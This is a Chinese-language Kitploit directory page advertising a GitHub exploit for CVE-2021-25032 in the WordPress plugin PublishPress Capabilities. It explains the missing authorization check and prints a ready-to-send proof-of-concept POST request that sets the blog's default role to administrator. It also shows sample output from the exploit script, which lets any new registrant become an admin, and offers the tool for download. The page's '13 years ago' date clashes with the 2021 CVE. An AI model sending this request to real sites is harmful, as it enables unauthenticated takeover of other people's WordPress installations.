Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-25032 — PublishPress Capabilities < 2.3.1 - 未认证的任意选项更新导致博客沦陷 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2021-25032
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证错误配置
GitHubrandomrobbiebf/cve-2021-25032

CVE-2021-25032

PublishPress Capabilities < 2.3.1 - 未认证的任意选项更新导致博客沦陷

查看仓库
13年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-25032

PublishPress Capabilities 2.2 - 2.3 - 未认证的任意选项更新导致博客被入侵

描述

该插件在通过 init 钩子更新插件设置时,未进行授权和 CSRF 检查,也未确保要更新的选项属于该插件。因此,未认证的攻击者可以更新任意博客选项,例如默认角色,从而使任何新注册的用户都能获得管理员角色。

概念验证

root@kitploit:~
POST /wp-admin/admin.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 81
Connection: close

page=pp-capabilities-settings&all_options=default_role&default_role=administrator

脚本使用示例

启用注册与管理员角色

root@kitploit:~
$ python3 CVE-2021-25032.py -u http://wordpress.lan
The plugin version is below 2.3.1.
The plugin version is 2.2
Vulnerability check: http://wordpress.lan
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.

禁用注册与订阅者角色

root@kitploit:~
$ python3 CVE-2021-25032.py -u http://wordpress.lan --fix yes
Vulnerability check: http://wordpress.lan
Options set successfully: http://wordpress.lan/wp-admin/admin.php
Fixed: You can not longer register
下载工具